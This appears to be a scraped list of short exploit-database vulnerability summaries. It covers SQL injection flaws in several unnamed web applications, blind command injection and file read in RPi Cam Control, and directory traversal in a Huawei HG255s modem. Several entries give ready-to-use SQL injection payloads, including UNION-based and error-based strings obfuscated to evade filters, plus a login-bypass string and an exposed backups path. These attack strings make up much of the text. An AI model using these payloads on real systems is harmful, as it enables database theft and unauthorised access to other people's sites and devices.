The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter of the web application. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter of the application. Proof of Concept: http://localhost/[PATH]/result/[SQL]/eFe http://localhost/[PATH]/business/[SQL]/eFe
RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection. Local File Read is performed by sending a POST request to the preview.php page with the download1 parameter set to the path of the file to be read. Blind Command Injection is performed by sending a POST request to the preview.php page with the convertCmd parameter set to the command to be executed. Because the injection is blind, it can be combined with Local File Read to retrieve the output of the injected command.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/job-details/[SQL]/eFe -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe
The vulnerability allows an attacker to inject SQL commands.... Proof of Concept: http://localhost/[PATH]/taskers?skills=[SQL] 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter 'escort' in the prof_detils.html and ajax_rating.php files.
A directory traversal vulnerability was discovered in the Huawei HG255s modem. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g. “../”) to the vulnerable device. This allows the attacker to access sensitive information such as the /etc/passwd file. A proof-of-concept video and HTTP request are available.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: SQL: http://localhost/[PATH]/editclient.php?id=[SQL] -100+/*!11122UniOn*/+/*!11122SeleCt*/+0x283129,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283329,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION())--+- Bypass: http://localhost/[PATH]/index.php User: 'or 1=1 or ''=' Pass: anything Backup: http://localhost/[PATH]/backups/index.php?client_name=admin Etc...
The vulnerability allows an attacker to inject SQL commands.... Proof of Concept: SQL: http://localhost/[PATH]/ezban.php?id=[SQL]&action=show 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show